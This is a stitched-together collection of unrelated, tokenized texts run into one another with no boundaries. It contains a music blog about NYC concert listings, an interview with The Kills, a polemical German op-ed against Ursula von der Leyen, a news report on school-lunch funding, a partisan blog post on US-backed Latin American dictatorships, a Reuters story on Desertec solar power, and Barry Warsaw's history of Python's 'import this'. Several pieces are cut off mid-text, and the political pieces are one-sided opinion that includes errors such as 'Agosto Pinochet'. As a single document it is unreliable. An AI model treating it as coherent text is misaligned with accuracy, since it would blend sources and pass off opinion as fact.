As I mentioned to MMM yesterday , I feel like I 'm already done with the new Daft Punk and it's not even out yet !
But it will be tough to hold back with the new Spoon when they have n't spoken out against it ( yet ) and it 's piling up positive mentions on the Rub , Stereogum , Daily Refill , MOKB , ILM of course , and elsewhere .
I 'll try , but I get tempted easily .
Nouvelle Vague at Joe 's Pub on April 12
( Thanks to Brooklyn Vegan for the tip . )
They took what could have been a novelty cover album and made it into something way more real , and this 'll be their first - ever NYC appearance .
Tickets are on sale now .
You can stream their takes on " Love Will Tear Us Apart , " " Guns of Brixton , " and " A Forest " here .
Caribou , Four Tet , and the Junior Boys at Northsix on May 5 .
Two weeks back I was lamenting the lack of an NYC JB 's show .
We can now strike that .
Personally , I 'd flip the line - up and have Caribou start things off and the Junior Boys headline - but this is a very solid bill regardless .
I heard somewhere that the JB's are now only Jeremy Greenspan - I do n't know if that 's true though , or what that means for their ( his ? ) live show .
Four
Tet usually just mans his laptop , but he chops and tweaks his tunes considerably live .
Caribou have two drum kits and wear masks on stage , and also put on a good show .
Tickets are on sale now .
Dizzee Rascal at Irving Plaza on April 24 .
I was n't a huge fan of Showtime and his new single " Off 2 Work " is just OK , but he 's a great performer that 's even better live than on album IMO .
The one thing with Dizzee is that he set the bar exceedingly ( and perhaps impossibly ) high for himself with his amazing NYC debut on a flatbed truck at Volume ( a venue I still miss ) .
It 's the kind of thing Irving Plaza can't really compete with .
Tickets just went on sale at noon .
An Interview with The Kills
Volvo wants them , but The Kills are n't interested .
They 're more concerned about being confused with The Thrills or The Killers than cashing in .
This minimalist indie duo are not here to resurrect Robert Johnson or Charlie Patton .
There 's no agenda to save ROCK .
No , the Kills are camped out in the Chelsea Hotel to promote their new record , chain smoke some cigarettes , and work on their other hobbies : writing in their diaries and taking photographs with their digital camera .
We found The Kills , Alison Mosshart and Jamie Hince , ensconced around a table littered with cigarettes , water bottles , an iPod , and a worn copy of Gunther Grass 's The Tin Drum , a book about an " the eternal three - year - old drummer " that Jamie claims to have read dozens of times .
They were in New York doing interviews to promote their follow - up to 2003 's amazing Keep on Your Mean Side .
Alison and Jamie graciously sat down with us to discuss their music , those nagging White Stripes comparisons , and touring with Franz Ferdinand .
Jamie is unpretentious and outspoken .
He smoked a lot .
Alison is beautiful , articulate , and a bit shy .
She smoked even more .
Their platonic affection for one another was obvious and endearing .
Their chemistry will delight fans on their fantastic new record , No Wow .
How long were you in the studio with No Wow ?
Jamie :
We did in two parts .
We wrote it in Benton Harbor , Michigan .
We were there for four weeks .
We then took a week off and then recorded the album in three weeks in New York .
So you guys have a quick process then ?
Are you working a new album already ?
Alison :
Well , we did n't know that we did .
That was part of the challenge because we 've been on the road for so long and we do n't write while on tour .
It 's not what we 're drawn to doing .
We just do art on the road .
We take loads of photographs .
We draw and do collages and paint and film and write constantly .
So we went to the middle of nowhere and spread out all of this stuff we rounded up .
It was our inspiration .
Really , we panicked because we only had two months to write the new album so we gave ourselves only a month to do it to make it even scarier .
We sat down and spent about 80 % of our time talking and about 20 % talking and it worked .
Jamie :
If you do n't set yourself any themes or restrictions , it can be really hard to come up with something creative .
Naturally we were drawn to set up boundaries so that we could operate within one area and explore that as much as we could .
The boundaries we set were the lack of time we had to make the record .
It became the theme of the record .
We did n't have time to think about what we were doing .
We thought let 's make a record purely from our guts and our heart and not over - think anything or rework anything .
I was really fascinated by the possibility of making a record of 11 - 12 songs that represented 10 minutes of inspiration .
Even if it meant sitting around day dreaming for two days and then getting up and writing something for 10 minutes and then sleeping for a day .
Do you find American audiences are more or less willing to accept a band that plays with a drum machine and backing tracks ?
Jamie :
It 's pretty similar the world over .
Lots of people love it and it pisses so many people off .
Alison : A lot of people demand their money back .
We do have a drummer ; you just can't seem him .
Jamie :
The drum machine is a massively integral part of our sound .
It is an anti-rock thing for me .
Rock music always has these tempo changes and these explosions ; you know " FEEL THE ROCK " as it explodes in the chorus .
With a drum machine it's like a metronome that keeps you from doing that .
We found early on that it made us tense up when we played and we liked the sound of that tension .
But it really pisses people off .
It seems there were a lot more electronics on this record .
Was that intentional ?
Jamie : I 'm attracted to things that look good so if the recording equipment looks old and weird , I like it .
There were these weird drum machines in the studio we wrote in so we used them .
That 's the gut instinct version of what happened .
There 's an academic explanation as well .
Our first record was mistaken as a celebration of the " BIRTH OF ROCK " or " PRIMITIVE BLUES ROCK . "
I felt like our set up and our dynamic has a bit more in common with the birth of electronic music .
The drum machine is the heart of it .
We 're more affiliated with stripped down electronic music , like Suicide or Cabaret Voltaire as much as I did with Charlie Patton .
I 'm a white , middle class bloke from England .
I do n't quite have the blues in me [ laughs ] .
Well Eric Clapton did .
Jamie : Yeah , he 's terrible and that 's why .
What are you listening to these days ?
Jamie : TV on the Radio
Alison : Fiery Furnaces
Jamie : TV on the Radio is a stunning band .
They have such an amazing dynamic musically .
I love that they have such an unorthodox set up , both musically and racially .
They 're coming from a very different angle .
We met them in Iceland .
It was weird .
We were playing the same festival in Iceland and we were introduced to them a couple years ago .
Meeting TV on the Radio in Iceland is really bizarre .
Do you guys like the White Stripes ?
You guys get compared to them a lot .
Do you think it 's a valid comparison ?
Jamie : Yeah , we love them .
They kicked the door open for a lot of other bands .
It 's a good comparison .
That 's how people write .
Validity is not necessarily what you want or pleasing .
It 's relevant and that 's what people write .
So you guys were formally married as well ?
Jamie : I do n't really mind it .
It gets in the way of what we want to do .
I 'm sure there 's a ton of people who write us off because of the comparison .
I 'm sure there are people who listen to us because of the comparison and then are disappointed .
People like to compare bands to other bands .
It 's hard to describe music .
It 's always " a cross between ' blah blah ' and ' blah blah blah ' , mixed with a little bit of Pink Floyd . "
Or " it 's Patty Smith and Richard Hell 's love child . "
Your voice often sounds a lot like PJ Harvey , which is wonderful .
She 's one of my favorites .
Are you a fan of her ?
Is there anyone you do n't like to be compared to ?
Alison : PJ Harvey is amazing and so is Patti Smith .
If anyone said that I sound like Patti Smith , I would die because I think she 's incredible .
I 'd like to think that I could stand apart , like any band wants to .
Jamie : I think it 's always easier getting compared to bands that are way in the past than it is getting compared to bands that are around now .
Alison : Right , because people will say " You 're the new PJ Harvey " but she 's still alive .
So I ca n't be .
Jamie : PJ
Harvey is one of the reasons I ruined my life with music .
When I heard the first PJ Harvey record I knew that 's what I wanted to do .
She turned me on to a lot of music I listen to now .
Listening to her made me listen to [ Captain ]
Beefheart , which made me listen to Howlin ' Wolf , and then back to Charlie Patton .
Then she brought out " To Bring You My Love " and I thought " What the fuck ?
This is unbelievable . "
What was it like playing with Franz Ferdinand ?
Any crazy stories come out of that ?
Alison :
The tour was really good , actually .
It was really fun getting to know them .
It was a long tour so we went through all kinds of things .
We had this bus problem - someone 's bus would break every day .
We 'd end up being on the same bus with Franz .
Jamie :
We had a single - decker bus and it kept breaking down so the company sent us a double - decker bus , which is insane for a band of two people .
So we had this double - decker bus and we said " look at all this room ! "
Then Franz called us and told us their bus had broken down .
They said ask if they could stay on our bus and we said " of course , we have a double - decker . "
Alison : Paul [ Thomson ] would bring his portable record player everywhere so we'd have these little parties every night .
It was really , really fun .
It was strange playing to an audience that had never heard of us and were quite young .
They were really waiting for Franz to come out on stage .
It was like they were looking at their watches waiting for the band they came to see .
It was so challenging .
You can easily become depressed think there 's just no way to handle it because people do not care about you .
Something happened to us , something evolved .
We started to play very intensely - redirected our energy at the audience because you get lost in a room full of people who are n't supporting you .
That tour made us so strong .
We learned how to cope with that .
We learned how to make it ours and make it fun .
We got stronger and stronger and stronger .
Do you guys often get mixed up with the Thrills or the Killers ?
Alison :
That 's one of the most irritating things actually .
It drives me crazy , especially with the Killers .
I want to hit and punch anyone who makes that mistake .
Jamie :
We received treatments for the video for our song The Good Ones and we were sent one that said " THE GOOD ONES BY THE THRILLS ! "
It was in the bin immediately .
I like those bands ; well I do n't know those bands too well .
The Thrills are really good songwriters , but it 's not my thing .
The Killers are one of those things I just do n't get .
This seems to be one of those times when there are these really huge bands that no one will admit to liking .
Alison :
We were talking about that the other day .
In America it seems like music is n't really for the public .
It 's so corporate and over the top .
People end up not getting what they want , but what corporations think they want .
Jamie : America is the hardest country to just be a great band .
It 's hard for people to love your band and for you to do well because of just that .
It requires so much more than that .
It seems so mathematical and calculated here .
It seems to operate outside of kids going to shows and freaking out .
Most of the bands I 've interviewed recently have a totally different perspective on the music industry than bands used to .
I can't imagine that Sonic Youth would have agreed to be on The O.C. back in the 80's .
But now it seems like pretty much any band would do it .
It seems bands today are more busy savvy .
Is there anywhere you would draw the line ?
Jamie : I do n't think playing on a TV show is wrong , but commercials are different .
We get offered commercials all the time , in fact we were offered a commercial yesterday by Volvo .
Are you going to do it ?
Jamie :
No , we 're not .
Alison :
We 've been offered insane amounts of money .
It 's funny .
I think the last thing you want as an artist is to be branded with a product .
It 's really a horrifying thought .
I love the idea of being on film soundtracks , even TV shows .
That does n't bother me .
I do n't find myself offended by that .
Jamie : I do n't really feel offended by music in commercials .
The only time you know where your priorities are is when you get offered something like .
We thought about it for about five minutes and said no .
We thought what we could do with the money , but my instincts told me no .
But if Sonic Youth played on the O.C. , I would n't say " oh they sold out ! "
Things have really changed .
We live in a world where gossip magazines are the new pop art .
You can't apply the same rules or politics that applied to music about 10 years ago .
This interview was conducted by Jason Bell from One Louder and Robert Lanham from FREEWilliamsburg .
Check out Williamsburg for more interviews , reviews , opinions and more .
Politisches Leyen - Spiel Jens Berger
Ursula von der Leyen liegt offenbar beim Geschachere um die Köhler - Nachfolge vorne - dabei ist sie die denkbar schlechteste Alternative
Die Spatzen pfeifen es von den Dächern - Ursula von der Leyen ist anscheinend die Wunschkandidatin der CDU .
Sie soll , Medienberichten zufolge , Merkels Mädchen im Schloss Bellevue werden und der geschasste Arbeiterführer Rüttgers soll dann offenbar der dritte Arbeitsminister in der nicht einmal 200 Tage alten schwarz - gelben Regierung werden .
Diese Personalentscheidung wäre eine Zäsur in der bundesdeutschen Geschichte , die das politische System irreparabel beschädigen würde .
Das Amt des Bundespräsidenten ist eigentlich nicht als eine Außenstelle des Propagandaapparates der Regierung vorgesehen .
Das Grundgesetz weist dem Präsidenten zwar relativ wenig konkrete Machtbefugnisse zu , er ist jedoch als moralische Instanz ein wichtiges Korrektiv für die sich oft verselbständigende Parteiendemokratie .
Neben dem Bundesverfassungsgericht zählt das Amt des Präsidenten zu den wenigen Checks and Balances im politischen System der Bundesrepublik .
Ein treuer Parteisoldat , der per ordre mufti brav seine Regierung lobt und sich ansonsten auf rein repräsentative Aufgaben beschränkt , wäre die denkbar schlechteste Lösung .
Dabei gab es in der Geschichte Deutschlands beide Extreme .
Es gab einen Karl Carstens , der munter durch die Republik wanderte , als sei er die fleischgewordene Vorlage für die Filmfigur Forrest Gump , und sich ansonsten weitestgehend aus der Politik heraushielt .
Es gab aber auch einen Richard von Weizsäcker , der die Rolle des politischen Präsidenten ernst nahm und der Parteiendemokratie auch einmal kräftig die Leviten las .
Ein Richard von Weizsäcker nahm auch auf seinen Parteifreund und Kanzler Helmut Kohl keine Rücksicht und galt als moralisches Korrektiv zum oft tumben Pfälzer .
Dabei war die Parteiendemokratie im Jahre 1992 im Vergleich zur Gegenwart schon beinahe paradiesisch demokratisch .
Heute bräuchte es einen echten moralischen und intellektuellen Leuchtturm , der nicht nur die Integrität , sondern auch die geistige Kapazität besitzt , um der Parteiendemokratie Einhalt gebieten zu können .
Ein Fehler der deutschen Verfassung ist es jedoch , dass die Person , die der Tagespolitik geistige Leitplanken aufstellen soll , von eben diesen Politikern nominiert werden muss .
Wer den Sumpf trocken legen will , sollte natürlich nicht die Frösche fragen .
Fragt er sie doch , darf es auch nicht verwundern , wenn die oberste Unke statt der Trockenlegung die künstliche Bewässerung empfiehlt .
Ursula von der Leyen , die sich stets als opportunistische Karrieristin hervorgetan hat , ist kein geistiger Leuchtturm für die Republik , sondern bestenfalls ein Teelicht .
Die Supermutterpowertochter
Woher der Mythos der erfolgreichen Powerfrau von der Leyen stammt , ist nicht mehr nachzuvollziehen .
Ursula Gertrud von der Leyen wuchs in geordneten großbürgerlichen Verhältnissen auf .
" Röschen " , wie sie seit klein auf familienintern genannt wird , ist die Tochter des ehemaligen niedersächsischen Ministerpräsidenten Ernst Albrecht , Spross einer Dynastie , die bereits unter den Welfen - Königen Schlüsselpositionen im Staat bekleidete .
Standesgemäß heiratete sie in die Dynastie der " Seidenbarone " von der Leyen ein , die seit dem 18 .
Jahrhundert zum deutschen Establishment gehören .
Wer Ursula von der Leyen daheim besuchen will , fährt erst einmal lange durch familieneigenes Weideland , bevor er an einem gusseisernen Tor zum Betreten des schlossartigen Familienanwesens in Burgdorf - Beinhorn eingelassen wird .
Keine Frage , Ursula von der Leyen ist die personifizierte Oberschicht , ein feuchter Traum jedes Kitschromanautoren .
Doch " Röschen " schlug zunächst ein wenig aus der Art .
Ein Studium der Volkswirtschaftslehre brach sie nach drei Jahren erfolglos ab , und zwischen ihrem Abitur und ihrem ersten Staatsexamen als Medizinerin liegen stolze zehn Jahre - lückenlose Lebensläufe sehen anders aus .
Aber Frau von der Leyen musste sich schließlich nicht mit derlei profanen Problemen des gewöhnlichen Volkes herumschlagen .
Während ihrer vierjährigen Arbeitszeit als Assistenzärztin wurde die Powerfrau dreimal schwanger und schmiss dann auch ihre Ausbildung zur Fachärztin , um mit ihrem karriereorientierten Ehemann nach Kalifornien zu ziehen .
Wenn von der Leyen heute in der Presse als promovierte Gynäkologin oder Frauenärztin bezeichnet wird , so ist dies ein schlichter Etikettenschwindel .
Ursula von der Leyen war nie eine Powerfrau , die Karriere und Kinder unter einen
Hut brachte , sondern eine typische Vertreterin konservativer Familienbilder , die sich nur allzu gerne hinter ihrem erfolgreichen Vater und ihrem Mann versteckte .
Ihr kometenhafter Aufstieg begann erst vor sieben Jahren , als es die nunmehr siebenfache Mutter in Vaters Fußstapfen in die Politik zog .
Dank der Netzwerke ihres Vaters konnte sie trotz ihrer Unerfahrenheit nicht nur ein sicheres Direktmandat für den niedersächsischen Landtag erringen , sondern wurde auch gleich vom Familienfreund Christian Wulff zur Familienministerin ernannt - ein genialer PR - Coup , konnte die blonde , adrette Siebenfachmutter mit der züchtigen Haartracht doch als Sinnbild erfolgreicher konservativer Ideale verkauft werden .
Doch nun ging es erst richtig los - ein Jahr später wurde die " Powerfrau " ins CDU - Präsidium gewählt und zwei Jahre später beglückte sie die Republik bereits als Bundesfamilienministerin im Kabinett von Angela Merkel .
Ursula von der Leyen .
Foto : Michael von Aichberger .
Lizenz : CC -BY 3.0
Zensursula - Versagen auf ganzer Linie
Eigentlich ist das Familienministerium eine sichere Bank , auch wenn man , wie von der Leyen , für erzkonservative Familienpolitik steht .
Kindern die Köpfe tätscheln , sich für die Senioren und die Frauen einzusetzen , ist eine dankbare Aufgabe , bei der man nur selten politischen Gegenwind verspürt .
Nicht so Ursula von der Leyen - sie überspannte den Bogen , in dem sie sich ohne Not in eine Kampagne zur Einführung von Internetsperren einspannen ließ .
Ob " Zensursula " überhaupt wusste , was sie da vorschlug , ist nicht bekannt .
Kluge Politiker machen sich Gedanken , wenn sie mit Volldampf gegen eine Wand laufen .
Ursula von der Leyen schüttelt nur kurz benommen das blonde - nun kurz und fesch frisierte - Haupt , nimmt einen Meter mehr Anlauf und rennt abermals gegen die Wand .
Heute will am liebsten kein Unions - und SPD - Politiker etwas mit diesem Gesetz zu tun haben , an von der Leyens Hacken klebt es jedoch wie besonders hartnäckiger Hundekot .
Ihr Name ist bei einer ganzen Generation von internetaffinen Bürgern für immer verbrannt .
Doch noch nicht einmal dieser politische Offenbarungseid konnte von der Leyens steilen Weg an die Spitze stoppen , im Gegenteil - im letzten Jahr wurde sie trotz ihrer Inkompetenz im Familienministerium auch noch mit dem wichtigeren Ministerium für Arbeit und Soziales belohnt .
Auch hier patzte von der Leyen ziemlich schnell auf ganzer Linie .
Ihr Vorschlag , den Unmut der Bevölkerung gegen Hartz IV durch eine Umbenennung zu mildern , hat dabei bestenfalls als Steilvorlage für Kabarettisten eine Daseinsberechtigung .
Ihren schlechten Sinn fürs Timing bewies die Powertochter erst gestern , als sie im Windschatten vom Köhler - Rücktritt erst einmal nichts Besseres zu tun hatte , als ihr neues Projekt " Bürgerarbeit " vorzustellen - womit nichts anderes gemeint ist als Schneeschippen und Straßenkehren für Hartz - IV - Empfänger .
Ja , Frau Hochwohlgeboren eignet sich qua Stand und Verstand ganz hervorragend für die einigende Funktion einer Präsidentin - welch Hohn für die Betroffenen ihrer Politik .
Warum von der Leyen ?
Von der Leyens Nominierung wäre ein Befreiungsschlag für Angela Merkel .
Die angeschlagene Regentin wünscht sich keinen starken Präsidenten , der ihr und ihrer schwarz - gelben Chaostruppe die Leviten liest .
Eine streitbare Person wie Norbert Lammert scheidet daher a priori aus .
Ursula von der Leyen ist eine geborene Repräsentantin .
Sie ist bei der Yellow Press , die sich insgeheim immer noch den Kaiser zurückwünscht , außerordentlich beliebt .
Wer die Namen der schwedischen Königskinder auswendig kennt , liebt auch die edle Übermutter mit dem charmanten Lächeln und dem Adelsprädikat .
Mehr will Angela Merkel auch gar nicht , denn Ursula von der Leyen hat eine weitere Eigenschaft , die sie zur Wunschkandidatin macht - sie ist bedingungslos loyal .
Zum Widerstand fehlt ihr nicht nur das eigene Netzwerk , sondern auch der fachliche Hintergrund .
Wie soll eine Politikerdarstellerin auch Politikern die Leviten lesen ?
Wie soll eine Nutznießerin undemokratischer " Old- Boys - Networks " etwas Substanzielles zur Restauration der Demokratie beitragen ?
Sie kann es nicht - und das ist es , was Merkel an ihr schätzt .
Bankrotterklärung
Wenn Ursula von der Leyen wirklich Kandidatin für das höchste
Amt des Landes werden sollte , wäre dies die ultimative Bankrotterklärung der politischen Klasse .
Sie wäre nicht nur eine Notlösung , sondern eine glatte Fehlbesetzung .
Niemand käme auf die Idee , die aparte Blondine auch nur in die Nähe einer wie auch immer gearteten intellektuellen Prädisposition zu rücken .
Ursula von der Leyen wäre eine Sockenpuppe der Kanzlerin in Schloss Bellevue .
Das hat das Land nicht verdient , das hat das Volk nicht verdient , das hat aber auch das ehrenwerte Amt des Präsidenten nicht verdient .
Wie will die Politik gegen Politik ( er ) verdrossenheit vorgehen , wenn sie alles in ihrer Macht stehende tut , sie zu fördern ?
Horst Köhler ist zurückgetreten , weil er sein Amt durch freche Schmähkritik der Medien verletzt sah .
Eine Präsidentin von der Leyen wäre freche Schmähkritik für das Amt des Präsidenten .
Kann man eigentlich auch als Staatsbürger zurücktreten , wenn man sich verschaukelt fühlt ?
( Jens Berger )
Rep. George Miller enlisted the help of San Francisco chef Charles Phan as he proposed legislation Thursday that would spend $ 8 billion more on school lunches and other food programs in the next decade , opening a tug - of - war between farm subsidies and child nutrition as tight budgets force Congress to choose between the two .
" One of our goals is to adopt one school and start cooking , because what I see in the school program is so bad , it 's just amazing , " said Phan , the executive chef of Slanted Door and other restaurants in San Francisco and the father of three young children who attend schools in San Mateo .
Phan , who was in Washington , said he learned from experience with his local schools why much of the food served in schools is unhealthy :
With about $ 2 to spend on a meal , bound by regulations and offered such farm surpluses as " canned cheese " at huge discounts , schools " ca n't do it , so they just start serving really bad food . "
The enlistment of chefs is part of first lady Michelle Obama 's Let 's Move campaign against childhood obesity , which is quietly transforming U.S. food policy .
The coming fight over funding nutrition programs will pit Miller , a liberal 18 - term Martinez Democrat who chairs the House Education and Labor Committee , against Collin Peterson , a conservative Minnesota Democrat who chairs the House Agriculture Committee and is a champion of federal aid to corn , sugar , dairy , rice and other commodity crops .
House Speaker Nancy Pelosi , a close ally of both men , will have to mediate .
The three met in her office Wednesday .
Because Miller 's committee has yet to come up with cuts to match his proposal to spend an additional $ 8 billion , it would have to convince other committees , particularly Peterson's , to help fund the plan .
Doubling the money
Miller 's bold opening move would nearly double the extra money for child nutrition approved in March by the Senate Agriculture Committee whose chair , Sen. Blanche Lincoln , an Arkansas Democrat , is the daughter of a rice farmer .
Lincoln chose to add $ 4.5 billion for child nutrition to the Senate version of the bill by cutting money that helps farmers improve the environment , leaving crop subsidies unscathed .
Miller supports Lincoln 's approach but said cuts in farm subsidies are also under discussion .
Miller must find savings somewhere to get the increase he wants for school lunches .
The offsetting cuts can come from anywhere , but farm subsidies are an obvious target because they enable companies to produce low - cost , high - calorie foods that are blamed in part for the nation 's obesity epidemic .
The $ 17 billion school lunch program feeds 32 million children a day but is only one of many federal food programs that include summer and after - school meals and the Women , Infants and Children program for poor mothers .
Long - term program
Miller and other Democrats want to close all gaps in food programs for poor children so that meals are available " from birth to the end of high school . "
He wants more children automatically enrolled in meal programs , and his plan includes money to link local farms with schools to provide fresher food .
" This is a bill that America needs , " he said .
" The schools are not going to solve this problem by themselves , but they are a very , very important platform in terms of showing our children an alternative to an unhealthy eating style that afflicts many of them for many years . "
Rep. Todd Platts , a Pennsylvania Republican , signed on , arguing that spending an additional $ 800 million a year to help reduce obesity and improve children 's school performance is a drop in the bucket compared with the overall $ 3.6 trillion federal budget .
' Dramatic savings '
" We know there can be dramatic savings over the long term , " Platts said .
Obesity is a major component in the nation 's health care bill .
Phan said his children , ages 8 to 11 , cried when his wife tried to make them eat school lunches .
" It 's always been my belief that the first thing you teach kids is how to eat , because once you get them hooked on good food , they 're not going to go back , " Phan said .
He pointed to San Francisco 's Chinatown , where many people live in poverty but can afford to eat lots of produce .
" There 's no McDonald 's in Chinatown , " Phan said .
" Cooking a little shrimp or pork with spinach is much cheaper to do in Chinatown than if you buy a family a Happy Meal . "
Other chefs at Thursday 's news conference were equally ruthless about school meals .
" We pack our lunch , " said Linton Hopkins , the owner of Restaurant Eugene in Atlanta who has two children in public schools .
He said a third of the other parents do , too .
Hopkins said he has been working with public schools for five years , planting an organic garden , introducing salad bars and " getting water in as a beverage . "
He said money is the chief problem .
" So many times , that becomes your prime motivator , and unfortunately as a food - service operator , you make some bad choices about where you source your food and how much nutrition you can put on a plate . "
Good school food comes down to " very simple truths , " Hopkins said .
" It says ' made with real lemon ' on our furniture polish , but then on our ' lemon drink , ' it 's 10 percent juice .
How about we just have lemonade ? "
If you manage this site and have a question about why the site is not available , please contact NetFirms directly .
I ’ve noticed considerable confusion over why South American countries seem to be more anti-US than they used to be .
The answer lies in former US efforts to suppress democracy , encourage terror , and even teach torture in those nations .
“ The precise pain , in the precise place , in the precise amount , for the desired effect . ” – Dan Mitrione , United States government security advisor for the CIA in Latin America , and instructor in the art of torture teaching techniques in Uruguay during the nation ’s 1973 - 1985 military dictatorship .
US intervention continues to haunt Latin America , a region overrun with brutal military dictatorships during the 1970 ’s and 80’s .
Dictatorships coordinated torture , assassinations and disappearances under a US - backed program in Argentina , Brazil , Chile , Paraguay and Uruguay .
The program , called Plan Condor , was a shared strategy in Latin America ’s Southern Region during the 1970s and 80s and had Washington involvement .
Human rights groups claim that tens of thousands were killed during South America ’s darkest period during the 1970 ’s and 1980 ’s under the military dictatorships .
Military governments came to power via well planned coups in Argentina , Brazil , Chile , Paraguay and Uruguay .
In Argentina alone , an estimated 30,000 people were forcefully disappeared .
Now nearly 30 years later , long standing impunity has overshadowed efforts for regional integration and return to democratic rule .
Throughout the region , the road to justice has been slow .
Argentina has taken the lead in trying former military and police after amnesty laws protecting military have been overturned in 2005 .
However , Uruguay and Brazil still uphold amnesty laws preventing human rights trials from taking place .
While in Chile justice is possible , the nation grapples with dictator supporters in government who continue to hold up legal proceedings …
… The slogan “ Never Again ” was adopted with the hope that Argentina and other countries in the region , including Brazil , Chile and Uruguay , ruled by violent military dictatorships would never repeat that dark chapter in history .
Decades have passed since the end to the dictatorships in the region and much heralded “ return to democracy . ”
But many of the old systems of repression remain .
In Argentina a key human rights witness , Julio Lopez remains missing after his 2006 disappearance .
Survivors in the region continue to face threats and security issues on the brink of their testimonies in trials .
Much of the files and top - secret information has yet to be released about the crimes the military coups committed .
Plan Condor united the nations in a plan to wipe out dissidents regionally through state imposed terror .
Now , governments in the Southern Cone have the opportunity to work together to revisit the past and investigate the crimes which continue to be a social stigma scarring the respective countries .
Without justice and with outstanding impunity , history is likely to repeat itself … [ emphasis added ]
Inserted from < Toward Freedom >
Between the ellipses , the author updates the progress in each of these nations .
If you click through , it ’s worth the read .
During the Nixon and Reagan years , the US engaged in state sponsored terrorism in which the body count far and away exceeded the number of people killed in Al Qaeda sponsored Terrorism .
September 11 is just as famous in South America as it is in the US .
On September 11 , 1973 , Richard Nixon , Henry Kissinger and the GOP helped orchestrate the coup in which elected President Salvador Allende was murdered and replaced by the infamous Agosto Pinochet .
Thousands were fatally disappeared in its wake , including a US reporter .
His story is accurately portrayed in the movie Missing .
Kissenger feared that Allende might nationalize Chile ’s copper mining and smelting to benefit Chile ’s people , pushing out US corporations in the process .
This is the case about which we have the most evidence of GOP involvement .
However Henry Kissinger was indicted in several countries in the region .
Reagan and GHW Bush were more involved repressing Central American nations for their resources , while GW ChickenHawk had plans to conquer eight nations in the Middle East , South Asia , and Africa .
Only GOP incompetence in conducting our two current wars saved the other six .
So why is this important now ?
We need to understand that wars of aggression and state sponsored terrorism are nothing new .
It ’s how the GOP does business .
They must be kept out of power .
ALGIERS ( Reuters ) - Europe will import its first solar - generated electricity from North Africa within the next five years , European Energy Commissioner Guenther Oettinger said in an interview on Sunday .
A caravan of camels loaded with sacks of raw salt travels across the desert near Tichit , Mauritania December 5 , 2006 .
REUTERS / David Rouge
The European Union is backing projects to turn the plentiful sunlight in the Sahara desert into electricity for power - hungry Europe , a scheme it hopes will help meet its target of deriving 20 percent of its energy from renewable sources in 2020 .
“ I think some models starting in the next 5 years will bring some hundreds of megawatts to the European market , ” Oettinger told Reuters after a meeting with energy ministers from Algeria , Morocco and Tunisia .
He said those initial volumes would come from small pilot projects , but the amount of electricity would go up into the thousands of megawatts as projects including the 400 billion euro ( $ 495 billion ) Desertec solar scheme come on stream .
“ Desertec as a whole is a vision for the next 20 to 40 years with investment of hundreds of billions of euros , ” said Oettinger .
“ To integrate a bigger percentage of renewables , solar and wind , needs time . ”
The EU is backing the construction of new electricity cables , known as inter-connectors , under the Mediterranean Sea to carry this renewable energy from North Africa to Europe .
Some environmental groups have warned these cables could be used instead to import non-renewable electricity from coal - and gas - fired power stations in north Africa .
“ This is a good question but not a question to destroy our project , ” Oettinger said .
“ This question must be answered by a good answer and so we need ways to ensure that our import of electricity is from renewables . ”
He said he believed it was technologically possible to monitor electricity imports to the EU and establish if they come from renewable sources or fossil fuels .
“ This question must be solved in the next years , ” he said .
SOLAR SUBISIDIES
The Desertec consortium includes major firms such as Siemens , RWE and Deutsche Bank .
They are expected to seek public money for the project .
Oettinger said the EU ’s assistance was likely to include help coordinating stakeholders , updating regulations to allow the imported electricity to move across European borders , and financing feasibility studies .
On the prospect of EU subsidies , or the European Commission permitting state aid to firms involved in the project , he said that would become clear once the consortium has presented a detailed business plan .
Oettinger said all three energy ministers at the meeting in the Algerian capital sent a signal they were willing to build the infrastructure and common market rules needed to allow a trade in renewable electricity with Europe .
He countered concerns expressed in the past by some officials in Algeria that the project could involve Europeans exploiting north Africa ’s natural resources .
“ Renewables are a two - way partnership because electricity produced here is for the home market of north African countries , ” he said .
“ Maybe a bigger percentage of the electricity will be exported to Europe but at the same time we have to export the technology , tools , machines , experts , and so it ’s a real partnership , not only a partnership by selling and by buying . ”
import this and the Zen of Python
Written by Barry Warsaw in technology on Tue 08 June 2010 .
Tags : python , history ,
Richard Jones is working on a talk for PyCon Australia and asked me about the history of the Zen of Python , Tim Peters ' eternal words of wisdom , often quoted , on the essential truths of Python .
At first , I could n't find a reference to the first publication of this list , but then I did a better search of my archives and found that it was originally sent to the python - list mailing list on June 4 , 1999 , under the subject " The Python Way " .
Interestingly enough , because I could n't find that first reference immediately , I went back into my archives and researched the " this " module .
Did you know that if you type the following at a modern Python interpreter , you get the Zen of Python ?
% python3 -c " import this " The Zen of Python , by Tim Peters Beautiful is better than ugly .
Explicit is better than implicit .
Simple is better than complex .
Complex is better than complicated .
Flat is better than nested .
Sparse is better than dense .
Readability counts .
Special cases are n't special enough to break the rules .
Although practicality beats purity .
Errors should never pass silently .
Unless explicitly silenced .
In the face of ambiguity , refuse the temptation to guess .
There should be one -- and preferably only one -- obvious way to do it .
Although that way may not be obvious at first unless you 're Dutch .
Now is better than never .
Although never is often better than * right * now .
If the implementation is hard to explain , it 's a bad idea .
If the implementation is easy to explain , it may be a good idea .
Namespaces are one honking great idea -- let 's do more of those !
The story behind " import this " is kind of funny , and occurred totally behind the scenes , so I thought it might be interesting to relate how it happened .
Maybe something to add to Guido's History of Python blog .
Anyway , back in fall 2001 , Foretec was organizing the International Python Conference # 10 ( IPC 10 , precursor to Pycon ) .
Foretec was a conference organizing company owned by CNRI , which earlier had employed Guido , Fred , Jeremy and myself , and which by 2000 we had left to form Pythonlabs at various friendly ( and occasionally disfunctional ) corporate homes .
By September 13 , 2001 ( yes , how weird ! ) we were working for our friends at Zope Corporation ( perhaps not yet rebranded from Digitial Creations ) , but Foretec was still organizing the IPCs .
They wanted to have a slogan for the conference , which could be printed on a t - shirt , and wanted to gather submissions from the Python community .
Pythonlabs agreed to judge the entries and select a winner .
However , I think Guido's wife was due any day and he did n't have much time or energy to go through the entries .
We got something like 500 entries , almost all of them terrible .
Tim 's exact words were " Jeez Louise , I can't look at these for more than 5 minutes w/o my brain turning to mush " and yet he still managed to do an initial cut down to something like 130 entries .
While we had agreed to choose a winner , we procrastinated until the last minute and by then it was obvious that Tim and I were the only ones crazy enough to still care .
Tim suggested that we trade the list back and forth between the two of us , each cutting the list in half until there was just one left .
Tim is much better at math than me , and I had forgotten about Python 's integer division so I was left to choose from between the last two entries : " Bite off all you like - Chewing is optional " ( yes , I said most were terrible ; ) , and " import this " .
At the last minute , Tim resurrected a fun one that we had both noticed approvingly early on : " Let 's we study about Python program " .
While that last one had lots of appeal , I liked the irreverent , almost sneering tone of " import this " .
